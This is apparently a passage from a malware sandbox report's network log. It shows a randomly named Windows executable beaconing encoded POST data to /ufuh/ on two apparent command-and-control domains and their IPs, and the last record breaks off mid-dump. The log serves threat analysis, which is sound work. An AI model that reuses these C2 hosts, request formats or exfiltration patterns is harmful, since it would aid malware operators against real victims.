Jun 3, 2024 08:54:58.563519001 CEST	798	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 03 Jun 2024 06:54:58 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Powered-By: PHP/5.4.16 Content-Encoding: gzip Data Raw: 32 33 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 53 4d 6f 9b 40 10 bd f3 2b 26 f8 90 44 35 c6 a4 76 55 01 46 aa d2 aa 3d a4 6a d4 ba 87 aa ca 61 bd 0c b0 32 ec d2 dd 25 0e 8d f2 df 3b 0b a4 49 7c 09 48 2c cc bc f7 e6 93 f4 e4 e3 b7 cb ed af eb 4f f0 65 fb f5 2a f3 d2 ca 36 b5 3b 90 e5 74 34 68 19 54 d6 b6 01 fe e9 c4 ed c6 bf 54 d2 a2 b4 c1 b6 6f d1 07 3e 7e 6d 7c 8b 77 36 74 d4 04 78 c5 b4 41 bb e9 6c 11 bc f7 21 24 15 2b 6c 8d d9 35 2b 11 a4 b2 50 a8 4e e6 69 38 5a bd d4 70 2d 5a 9b 89 e2 ec 20 64 ae 0e 8b 5a 71 66 85 92 8b 4a 63 b1 30 6d 2d ec d9 e9 ec f4 fc 77 74 73 b2 21 2a 16 42 62 7e 7e 9f 2b de 35 14 fe 25 01 36 f0 9a ce f2 e6 cd eb a1 92 87 34 9c 52 a3 1c 6d 5f 23 58 2a 7a aa 95 1b e3 67 de 4e e5 bd 77 ef 01 5d 3b c6 f7 a5 76 95 c5 b3 a2 40 8e 3c 71 66 ef c1 9b b9 2e 31 4a 59 4f 50 27 10 b0 5a 94 32 06 4e f9 a3 4e 1c ac 21 0c 21 06 48 2e 28 17 d6 c7 20 64 4d cc 60 47 89 ee 93 c1 c5 55 ad 74 3c 5b af d7 e3 f7 4e e9 1c 75 a0 59 2e 3a 13 47 cb f6 6e b4 17 14 35 28 58 23 ea 3e de b2 4a 35 6c fe [TRUNCATED] Data Ascii: 23aSMo@+&D5vUF=ja2%;I\|H,Oe6;t4hTTo>~m\|w6txAl!$+l5+PNi8Zp-Z dZqfJc0m-wts!Bb~~+5%64Rm_#XzgNw];v@<qf.1JYOP'Z2NN!!H.( dM`GUt<[NuY.:Gn5(X#>J5l%-X=7LE2@q=[B <={4LBN{h<BSY;K%W]<oZtwm3.Gpcqzg1-\|o?:^8]_e$cECir&U~~3Vi9%JC"CZv56.YU!5U?tt\0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.22	49202	84.33.215.91	80	2580	C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 3, 2024 08:55:00.233598948 CEST	2472	OUT	POST /ufuh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Length: 3625 Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Host: www.exclaimer342200213.net Origin: http://www.exclaimer342200213.net Referer: http://www.exclaimer342200213.net/ufuh/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36 Data Raw: 5a 58 64 70 3d 30 70 34 53 71 50 38 6c 55 6f 42 47 53 70 46 30 4f 74 78 78 6a 4a 35 6f 68 44 4b 4c 41 56 67 4a 37 44 70 37 74 65 48 36 45 57 72 6c 6a 4d 43 66 4d 4a 62 52 38 65 6c 5a 75 56 79 53 71 63 49 33 38 56 50 49 45 48 55 65 75 65 75 5a 2f 35 6f 32 7a 68 70 69 34 4e 38 79 74 55 42 44 43 6e 6f 2b 57 4f 42 7a 47 6b 51 54 57 50 43 70 4c 6d 35 75 32 36 38 4b 46 6e 4e 44 7a 35 33 6a 58 77 34 5a 70 31 76 4f 39 36 30 7a 52 66 34 6c 2f 51 46 70 74 78 36 62 34 5a 36 55 78 4d 73 56 6a 71 30 69 2f 6a 58 68 6e 68 7a 4a 75 52 51 43 37 66 62 6e 66 41 61 63 70 42 65 52 45 38 67 34 54 74 58 48 69 30 71 66 49 4c 4a 5a 62 58 47 30 69 2b 4e 79 33 34 39 4f 38 61 6c 68 34 2f 48 6b 67 69 76 44 48 31 70 77 45 6b 30 61 4f 75 32 31 50 67 43 31 65 61 67 43 4f 6f 6e 4e 44 71 39 58 2b 79 54 6a 49 4c 77 77 4a 6a 59 54 46 66 58 70 6e 6f 66 49 37 58 64 52 74 48 65 32 53 59 6b 76 55 6f 2f 69 36 45 4c 50 74 6c 6c 51 54 67 68 75 2b 37 7a 59 2f 6f 72 36 55 58 62 57 5a 45 49 2b 4e 78 58 71 59 54 33 4a 32 39 65 74 79 36 49 46 79 [TRUNCATED] Data Ascii: ZXdp=0p4SqP8lUoBGSpF0OtxxjJ5ohDKLAVgJ7Dp7teH6EWrljMCfMJbR8elZuVySqcI38VPIEHUeueuZ/5o2zhpi4N8ytUBDCno+WOBzGkQTWPCpLm5u268KFnNDz53jXw4Zp1vO960zRf4l/QFptx6b4Z6UxMsVjq0i/jXhnhzJuRQC7fbnfAacpBeRE8g4TtXHi0qfILJZbXG0i+Ny349O8alh4/HkgivDH1pwEk0aOu21PgC1eagCOonNDq9X+yTjILwwJjYTFfXpnofI7XdRtHe2SYkvUo/i6ELPtllQTghu+7zY/or6UXbWZEI+NxXqYT3J29ety6IFy5ENYNXA9VIVqiSZHkhwqe6rrSOmNyF2Iha6ueRqsOVapNu2YBojQMuiE/D5ePbj5Tn3qHxN1pzKxJ+KNIHbsA/z5TNAQ4tTQmy3P408Kc+TTIO56lgwZKm9tecxOVQZex8Z5fUeFG8nyXQ2MOCaaF9wW5uUrckNU3HF9K+jIO+XFAd96QgqD55L+IA6lUvZMfrpd1+QhVR8wRCXqBXvvG+b2v/8smFfmp4s4723h2UoOaLYz6VRy/S23pLeriDcf00YINp5Gfn1qJX6ssZ6l9hA/a1aGAqfao+braEtK9rGwXNx5afDCAGXaPGhw4H0yPEoA+NWXz0TZfOFP0qcTwGF2AjuDM47KPoRW33iiq0BlEtb0P6pSqQEt5eJ8SXwRqE5Pvh3r5H5vC6yROy5si9vAn85OfL7APXCcdn373DAEc3voCkIwXsc6bPqGbrC8myMwxBPtBiQKY0LjXZAXFNBK/SLSfHiyISVPceQM18ylHPURF3zZjOa9x69OP8o5mhm4xnL5PLDqAYqFYHpLiR2/Qe3NK2XOmZnniB7/rmwiRmhpDcrgLED+M+qSpUqipERDUE7TIgTPwXx8ZmLL/LxAhcM0uFcyBDZNRNApEMXcdgQq9WqpBCuEdwR+aT1TikzTBP9h/Er6e1STEPiFpoKNQJhQ0k4JCz [TRUNCATED]
Jun 3, 2024 08:55:00.238595963 CEST	1705	OUT	Data Raw: 49 7a 42 79 2f 70 7a 78 43 77 48 63 74 5a 5a 45 61 41 4e 4e 58 41 31 56 62 63 33 55 6e 78 38 59 4d 4e 42 6f 70 55 71 4b 55 34 41 6e 38 56 4e 41 35 33 32 77 45 47 46 34 67 6a 4f 76 67 4a 32 58 6b 35 66 39 54 74 36 64 7a 72 64 39 4f 2b 43 50 4a 62 Data Ascii: IzBy/pzxCwHctZZEaANNXA1Vbc3Unx8YMNBopUqKU4An8VNA532wEGF4gjOvgJ2Xk5f9Tt6dzrd9O+CPJbp1RQWQoSjIO4mV2fOPesjmzFYbTANg9lqxRacdZ5dGe6eYvCsJfqYPXdzYLePim4+gFmhZgmTXRixZyRjLPIm8EOrrsTaPwk53wbF+8AkhmwaDrAIyaolGsdC/yhDij+sFcqNeXSdsUESeNW8cY9xKNSPR2UWw2Hu
Jun 3, 2024 08:55:01.090895891 CEST	798	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 03 Jun 2024 06:55:00 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Powered-By: PHP/5.4.16 Content-Encoding: gzip Data Raw: 32 33 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 53 4d 6f 9b 40 10 bd f3 2b 26 f8 90 44 35 c6 a4 76 55 01 46 aa d2 aa 3d a4 6a d4 ba 87 aa ca 61 bd 0c b0 32 ec d2 dd 25 0e 8d f2 df 3b 0b a4 49 7c 09 48 2c cc bc f7 e6 93 f4 e4 e3 b7 cb ed af eb 4f f0 65 fb f5 2a f3 d2 ca 36 b5 3b 90 e5 74 34 68 19 54 d6 b6 01 fe e9 c4 ed c6 bf 54 d2 a2 b4 c1 b6 6f d1 07 3e 7e 6d 7c 8b 77 36 74 d4 04 78 c5 b4 41 bb e9 6c 11 bc f7 21 24 15 2b 6c 8d d9 35 2b 11 a4 b2 50 a8 4e e6 69 38 5a bd d4 70 2d 5a 9b 89 e2 ec 20 64 ae 0e 8b 5a 71 66 85 92 8b 4a 63 b1 30 6d 2d ec d9 e9 ec f4 fc 77 74 73 b2 21 2a 16 42 62 7e 7e 9f 2b de 35 14 fe 25 01 36 f0 9a ce f2 e6 cd eb a1 92 87 34 9c 52 a3 1c 6d 5f 23 58 2a 7a aa 95 1b e3 67 de 4e e5 bd 77 ef 01 5d 3b c6 f7 a5 76 95 c5 b3 a2 40 8e 3c 71 66 ef c1 9b b9 2e 31 4a 59 4f 50 27 10 b0 5a 94 32 06 4e f9 a3 4e 1c ac 21 0c 21 06 48 2e 28 17 d6 c7 20 64 4d cc 60 47 89 ee 93 c1 c5 55 ad 74 3c 5b af d7 e3 f7 4e e9 1c 75 a0 59 2e 3a 13 47 cb f6 6e b4 17 14 35 28 58 23 ea 3e de b2 4a 35 6c fe [TRUNCATED] Data Ascii: 23aSMo@+&D5vUF=ja2%;I\|H,Oe6;t4hTTo>~m\|w6txAl!$+l5+PNi8Zp-Z dZqfJc0m-wts!Bb~~+5%64Rm_#XzgNw];v@<qf.1JYOP'Z2NN!!H.( dM`GUt<[NuY.:Gn5(X#>J5l%-X=7LE2@q=[B <={4LBN{h<BSY;K%W]<oZtwm3.Gpcqzg1-\|o?:^8]_e$cECir&U~~3Vi9%JC"CZv56.YU!5U?tt\0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.22	49203	84.33.215.91	80	2580	C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 3, 2024 08:55:02.764327049 CEST	471	OUT	GET /ufuh/?ZXdp=5rQyp7AfCpcectMtK85Tor8vuSCbHlk40GVR54bgOEPBq5WbA6vQ6axdzD+rl+5xsD3/ThNnrc69/oVplzpG8oUJt2RlBzVyO+lvFGg0fvO7LE0dkvQsR1cSiZis&7jsp7=zz9xHbtX HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: close Host: www.exclaimer342200213.net User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Jun 3, 2024 08:55:03.639821053 CEST	1192	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 03 Jun 2024 06:55:03 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Powered-By: PHP/5.4.16 Data Raw: 33 64 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 3e 69 66 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 2e 73 70 6c 69 74 28 27 23 27 29 5b 31 5d 21 3d 75 6e 64 65 66 69 6e 65 64 29 7b 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 2e 73 70 6c 69 74 28 27 23 27 29 5b 30 5d 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 2e 73 70 6c 69 74 28 27 23 27 29 5b 31 5d 3b 7d 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 0a 7b 0a 20 20 20 20 62 61 63 6b [TRUNCATED] Data Ascii: 3dc<!DOCTYPE HTML><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>Page not found</title><script>if(window.location.href.split('#')[1]!=undefined){document.location.href = window.location.href.split('#')[0]+window.location.href.split('#')[1];}</script><style type="text/css">body{ background:#ffecec; }#container{ text-align: center;}#main{ display: inline-block; color:#555; border-radius:10px; font-family:Tahoma,Geneva,Arial,sans-serif;font-size:11px; padding:10px 10px 10px 36px; margin:10px;}h1{ font-size: 150px; margin: 100px 0 0 0; }h2{ text-transform:uppercase;}</style></head><body> <div id="container"> <div id="main"> <h1>404</h1> <h2>Sorry! that page can not be found...</h2> <h4>The URL was either incorrect, you took a wrong guess or there is a technical problem.</h4> </div> </div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.22	49204	172.67.182.131	80	2580	C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 3, 2024 08:55:08.792428970 CEST	2472	OUT	POST /ufuh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Length: 2161 Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Host: www.platinummedia.info Origin: http://www.platinummedia.info Referer: http://www.platinummedia.info/ufuh/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36 Data Raw: 5a 58 64 70 3d 64 4d 33 4b 61 41 4b 7a 38 38 36 30 4f 2f 6e 78 37 4c 2f 36 53 34 35 78 76 51 56 52 2f 66 68 38 58 66 38 70 48 37 34 66 47 6c 63 4e 36 33 4f 6c 6a 41 58 68 51 6a 78 6a 44 42 47 59 39 71 43 65 59 65 50 4d 46 4d 74 68 57 6f 64 6f 66 4d 76 65 62 30 57 76 61 79 35 58 4e 35 54 68 37 47 53 62 77 55 6c 43 65 66 4c 57 34 6f 35 6f 71 61 42 2f 62 44 50 37 36 6d 68 73 53 78 37 4b 4a 36 4f 4a 79 77 4b 39 74 2b 4c 39 48 6e 35 69 64 54 4b 39 69 62 50 33 4a 4f 59 48 6b 62 63 65 5a 53 33 4d 48 4b 51 73 71 44 35 41 35 45 61 56 6a 70 75 33 70 2f 59 63 31 65 68 30 48 6f 46 61 71 43 72 59 6c 70 53 5a 33 67 7a 78 66 6c 4d 2b 6b 2f 73 52 35 52 35 69 74 34 62 46 4e 76 74 75 4e 5a 50 34 6d 49 47 38 62 69 54 59 2f 31 6d 43 4d 58 53 6f 58 73 71 41 6c 56 77 64 2b 6e 45 41 42 52 35 2f 78 77 32 42 48 37 55 43 48 48 52 71 61 63 5a 69 44 72 56 72 4e 48 79 7a 76 6d 38 42 45 44 59 55 75 6b 49 7a 6c 50 76 72 49 32 75 4c 48 77 34 6e 36 38 69 55 47 79 46 42 4a 6a 70 6c 2b 4b 54 53 78 75 41 5a 45 62 2b 67 47 4f 30 72 7a [TRUNCATED] Data Ascii: ZXdp=dM3KaAKz8860O/nx7L/6S45xvQVR/fh8Xf8pH74fGlcN63OljAXhQjxjDBGY9qCeYePMFMthWodofMveb0Wvay5XN5Th7GSbwUlCefLW4o5oqaB/bDP76mhsSx7KJ6OJywK9t+L9Hn5idTK9ibP3JOYHkbceZS3MHKQsqD5A5EaVjpu3p/Yc1eh0HoFaqCrYlpSZ3gzxflM+k/sR5R5it4bFNvtuNZP4mIG8biTY/1mCMXSoXsqAlVwd+nEABR5/xw2BH7UCHHRqacZiDrVrNHyzvm8BEDYUukIzlPvrI2uLHw4n68iUGyFBJjpl+KTSxuAZEb+gGO0rzXZihdUB+atmYOq/7QUUIbIQuKzghatPlFd23unNPxC6uHo0ja9ypCv74Nfwi4vEVOqw2zymCWBcdjgCpztx+zwuVXY/JHvMjNZOT6TLiqnkWGCzikO4R++I6dH77IEdQf8/qeotmpKWtGMLuAtfIqTgL5x1JAgT6npqOafU2nOKMLIy+6cAJ53WLuTBXysMs9e+HpBcRQWFppnqqorH2FkaFrFw0xtjf4UJw9ykbVyMkSEk8d7CGO3rX2sdWDhXrcG/dVkJitu+PW3PlRcjn1gRft2/+8qpfi0OvXa/KAT35jK/7GS+R4//bfgfMYffPoK875wbUGksyUbr6UL2AUCqb1L5sUPJ8M5Q/6kK0CijD/iQYDA8Rbagef4fnpEy2AhR1ILPWAMRzvGd3pOK0jCCthJg/0tEgqBzAO0vnBCRKKdMEiwRvjzPdzdpI9Go5DwsKoVNCWWwTHZL50ZgB+HOOqbHGW3ZnSeWpSGM6FdPA195EfVEnBKtP4a0cZRvJsiZqvWvKyAImkg3zcUlcMLIZtuMOlAGAfqpBLQpmqKm/IRBIEf5qJpC8gSpF+r28lC5RuN/XAFCBfTzFotc6BNlb4OrN6jH81bGl3yeydSaqRS7bjLBLE0lk5l6+pwyY2M2aX/ZjKTSmkaXWR4uspSM830RDx2TyRR [TRUNCATED]
Jun 3, 2024 08:55:08.799312115 CEST	229	OUT	Data Raw: 69 54 38 6f 32 4d 76 66 33 6e 37 6e 45 4e 62 75 51 54 37 6d 69 6a 56 53 6f 78 2f 74 43 47 69 2f 79 72 4c 47 38 59 57 45 30 2b 41 6e 50 70 5a 6a 4a 43 49 55 6e 43 4c 2f 70 56 32 4f 41 4d 68 4c 4a 77 4e 69 56 69 69 6a 45 35 38 4b 33 61 2b 62 54 32 Data Ascii: iT8o2Mvf3n7nENbuQT7mijVSox/tCGi/yrLG8YWE0+AnPpZjJCIUnCL/pV2OAMhLJwNiViijE58K3a+bT2m75nabHGqlYRXJrIps6JoxVYMsyWiOMCnAE4TsBoIz6azMtOyXmNtgtkzPrY1zNTN/TuUgFVkBDCbf7Us3dTDABcPvbMYH83RL97rnKgcw/VsjBMQAXzZ82OD2UB6dxTozSH9/lA7KKE3BIwOQJ
Jun 3, 2024 08:55:09.857387066 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Mon, 03 Jun 2024 06:55:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://platinummedia.info/wp-json/>; rel="https://api.w.org/" CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1ZlzkatmlA66cbLqjKfpjzXWw0MT7miXOw5mZZQ4AiQMNMl2fk4KZWXyVS8pX4taEp1Ur1PORK%2FKDvQ32pgCJ6yTcSnjusx37SLaH5N%2BXiG7EhlXerfbBrU4mOZrKetlvMn7DRS%2BqMt%2B"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88ddc6a35886479c-DFW Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 Data Raw: 31 32 38 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d4 3b fd 8f db b6 92 3f 5f 80 fb 1f b8 5a bc 8d d4 48 b2 ec fd 48 62 c7 db 4b 93 ec 5d 0f cd 4b d1 34 38 1c b2 8b 05 2d 8d 64 26 14 a9 92 94 ed 7d ae ff f7 03 49 c9 96 6c 79 ed b4 7d 38 bc 00 c1 52 c3 e1 70 38 9c 4f 92 7e 75 f2 f6 c3 9b 5f ff f7 e7 77 68 aa 72 7a fd ef 4f 5e e9 bf 88 62 96 8d 1d 60 c1 a7 8f 8e 01 02 4e f4 df 1c 14 46 f1 14 0b 09 6a ec 7c fa f5 26 78 e1 ac e1 0c e7 30 76 66 04 e6 05 17 ca 41 31 67 0a 98 1a 3b 73 92 a8 e9 38 81 19 89 21 30 1f 3e 22 8c 28 82 69 20 63 4c 61 dc d7 54 fe 0d bd a2 84 7d 45 02 e8 d8 29 04 4f 09 05 07 4d 05 a4 63 67 aa 54 21 87 bd 5e 96 17 59 c8 45 d6 5b a4 ac d7 ef 3b d7 c8 8c 53 44 51 b8 fe 19 67 80 18 57 28 e5 25 4b d0 d9 e9 8b 41 bf 3f 42 05 c5 8a b0 32 47 ef 21 21 f8 55 cf 22 37 99 7e 2a f8 84 2b f9 74 cd f2 53 c6 09 4b 60 e1 23 c6 53 4e 29 9f 3f 45 bd eb 27 0d fe 30 55 20 18 56 e0 20 f5 50 c0 d8 c1 45 41 49 8c 15 e1 ac 27 a4 7c b6 c8 a9 83 cc 54 63 a7 cd 01 3a 13 f8 b7 92 8f d0 0d 40 b2 bd c0 1a 35 d7 98 [TRUNCATED] Data Ascii: 1283;?_ZHHbK]K48-d&}Ily}8Rp8O~u_whrzO^b`NFj\|&x0vfA1g;s8!0>"(i cLaT}E)OMcgT!^YE[;SDQgW(%KA?B2G!!U"7~*+tSK`#SN)?E'0U V PEAI'\|Tc:@5!a)I'90%e$XB]?yx?/ _GPL1Z:,"~pGr\m/(<=,n{B9C',Xeee
Jun 3, 2024 08:55:09.857412100 CEST	1236	IN	Data Raw: 2c 41 39 33 04 79 29 62 70 86 4b 27 e6 2c c6 ca 0c ab e8 1b f2 bb d2 b8 ed cd 8b 80 b0 98 96 89 9e ee 8b 34 00 33 30 10 40 01 4b 08 73 c2 c2 2f f2 fb 19 88 f1 55 78 19 9e 3b ab d5 e8 49 ef bb 13 f4 eb 94 48 a4 f5 1b 11 89 70 a9 78 90 01 03 81 15 Data Ascii: ,A93y)bpK',430@Ks/Ux;IHpx$dI[@>j8]J<>5^F+H%+T8/.9zx>IpQq3%.R2>V1VTOZ/\f@\|cfXS Ty>)WX(Wy#'
Jun 3, 2024 08:55:09.857424021 CEST	1236	IN	Data Raw: f5 14 91 64 fc 14 4b 25 70 a0 a6 90 43 10 4b a9 ff 3f b5 25 d1 53 53 05 74 56 44 f3 22 a8 4a c6 9e 19 29 7b 86 4c 0f 4b 09 4a f6 62 29 7b 39 61 24 25 90 f4 72 4c 98 a9 08 62 69 4b 82 8b f0 2a bc 7c 8a 0c b9 f1 53 4c a9 ad 31 0d 63 9d 2c 11 a6 e3 Data Ascii: dK%pCK?%SStVD"J){LKJb){9a$%rLbiK\|SL1c,PpA2<`@X,(p3/!<Q61cG".d1f?\|L PfBOywss1m@XQ*yyqc EY`@G(j"#fJ,I
Jun 3, 2024 08:55:09.857503891 CEST	636	IN	Data Raw: 02 1c 2b 93 bd 37 38 f3 ff 1a 4a 9a bb 2a b4 29 81 99 24 7a 1b 86 98 52 14 85 03 69 14 6f 23 d7 dd 85 55 43 79 a9 b4 0b ab 3d fb 1f db a1 da b1 98 f2 cb 9c 5a 19 8e 0a 6c d2 92 ba 4c dc b3 ea 9d 05 6a a0 9e f7 18 7a d5 c9 58 4d 6f 77 81 1b 72 87 Data Ascii: +78J)$zRio#UCy=ZlLjzXMowr=P-h=fuGS6:OIUz9I2PB4SebU]T:9M !Px)-u2$saP_.fZg{CL%&$O&A
Jun 3, 2024 08:55:09.857517958 CEST	1180	IN	Data Raw: a0 cd 07 08 9b 82 20 6a 0d b5 e9 b2 be 23 fe 17 3a 29 6a 76 55 8f 5a ba 0f 91 fc 2e ef b3 59 e4 67 fd da 21 90 f6 cc 52 cf 62 1a b5 33 ca f9 84 50 9d ca 92 2c d3 33 a0 46 d9 6d b5 ce 3a 5c 8b 66 fd ae c5 35 9a 91 63 da cc b3 2b b4 82 17 65 11 24 Data Ascii: j#:)jvUZ.Yg!Rb3P,3Fm:\f5c+e$AuAC[]@X)"XpJJ}Uh:VaKgmlN{a7=)`k8Xm["kgTW&\RQhZ{;l}
Jun 3, 2024 08:55:09.858501911 CEST	1236	IN	Data Raw: 31 38 61 31 0d 0a ec 5d 5b 6f e3 38 96 7e ae fe 15 9c 04 0d 94 ab 2d ad af b9 38 98 02 66 b7 d1 4f fb 36 2f 8b a9 29 14 14 5b 49 b4 2d 5b 86 64 27 a9 31 f2 df 17 3c bc 93 47 14 25 cb ee da 9e a0 80 6e 47 22 0f 0f 0f 29 5e ce e5 3b 6c 99 1a 62 24 Data Ascii: 18a1][o8~-8fO6/)[I-[d'1<G%nG")^;lb$NC(7B'mU_8V"g7+0kWsMhx$fX07WSnS6,B.`&FKMYni0^]qZ%N69{>2ewSV'}_
Jun 3, 2024 08:55:09.858513117 CEST	212	IN	Data Raw: 90 ce a4 81 ce bc 27 3a 57 a1 74 e6 2d 66 9b 13 c4 46 ea 62 6e 87 56 04 01 24 2e c0 c3 aa 4f b0 a8 9b 13 3c c4 a9 c1 5e 82 fc 5f 67 8f 67 d1 f0 50 f4 86 91 09 a6 13 36 72 be 80 f8 ba 81 c4 0d b4 c1 06 d6 b3 4e ba f3 1c 44 7f 98 1e 1e 7b 46 d3 e2 Data Ascii: ':Wt-fFbnV$.O<^_ggP6rND{FBj(fUzvEbN/@Pc_Dy5@&4@R&bH4~^y# Z7v6NrXeX"~\|(,<T*(<2r>-0
Jun 3, 2024 08:55:09.858558893 CEST	1236	IN	Data Raw: 5b 7d fb b6 2d 8b d5 7e 49 67 26 fe a2 fe cb 47 8b 47 c5 a6 4a f2 74 a8 26 31 2f 76 f1 95 20 82 87 b0 47 06 48 00 b1 8e 2c a8 1b 79 84 c7 a8 ca 20 49 31 55 2b 09 f0 00 be 53 02 c4 62 a0 e3 ed 6c 28 b0 79 0a 00 08 db 6c f3 38 38 31 43 89 e4 22 74 Data Ascii: [}-~Ig&GGJt&1/v GH,y I1U+Sbl(yl881C"th2c *&utVXo{kNO7NGa>1 CWXo\V0'"+V\|jA4p>V5J=ilZ0#ga
Jun 3, 2024 08:55:09.858633995 CEST	1236	IN	Data Raw: 99 c0 85 da 35 70 80 be 62 37 c7 81 b8 40 73 e9 cf 65 96 51 a4 c1 c6 3b e6 50 fd c4 0b 1f 74 8f d7 76 ad 39 17 51 4f 63 50 b6 45 c7 d4 b7 00 5a bd e4 91 5e ce 87 35 79 21 e3 32 4d 56 d1 1a ae c0 7a 46 02 70 7d 7d 43 b2 11 6e 09 80 84 6b 1a 11 a1 Data Ascii: 5pb7@seQ;Ptv9QOcPEZ^5y!2MVzFp}}Cnk)D2])@kff3S!3vhnBs~}-2 0Ok),i{ich#m2O_/l]]7x@tQptmX\
Jun 3, 2024 08:55:09.858647108 CEST	1236	IN	Data Raw: c0 64 5e 16 2f 04 2d e7 da e2 8f 6a 8c 0e 9a bf 2d a5 c9 3b f0 4c 47 a0 e5 1b 93 ff 20 d1 b8 31 34 b8 2d 63 3c 7e fa 3c 52 90 8d 1d 2f 05 a3 26 cf 31 c3 31 b7 bf ac 92 5d 12 f1 14 5c 7f bd 80 e9 f5 8d 3b a1 5d 7c b5 22 1c fd 73 ca 0d 4a 27 7d 35 Data Ascii: d^/-j-;LG 14-c<~<R/&11]\;]\|"sJ'}50l <F(i-vFe-x-m&1X*TTr9DkIhs=d8NbjL6kg/vjB2oU#ZVs0]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.22	49205	172.67.182.131	80	2580	C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 3, 2024 08:55:11.324817896 CEST	740	OUT	POST /ufuh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Length: 201 Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Host: www.platinummedia.info Origin: http://www.platinummedia.info Referer: http://www.platinummedia.info/ufuh/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36 Data Raw: 5a 58 64 70 3d 64 4d 33 4b 61 41 4b 7a 38 38 36 30 4f 38 2f 78 38 4a 62 36 54 59 35 78 75 51 56 52 74 66 68 36 58 66 77 58 48 2f 68 41 46 57 38 4e 36 69 79 6c 69 7a 76 68 65 44 78 6b 4c 68 47 63 7a 4b 43 58 59 65 4f 6a 46 4a 56 68 57 73 39 6f 64 70 7a 65 53 52 71 67 53 69 34 78 4c 35 54 67 37 47 65 6f 77 55 70 53 65 63 4c 57 34 72 74 6f 70 65 74 2f 64 68 58 37 2f 57 67 6e 55 78 37 6e 4a 36 43 63 79 77 61 6d 74 2b 66 39 48 57 6c 69 64 43 71 39 7a 36 50 33 44 75 59 47 75 37 64 2b 53 44 57 72 50 62 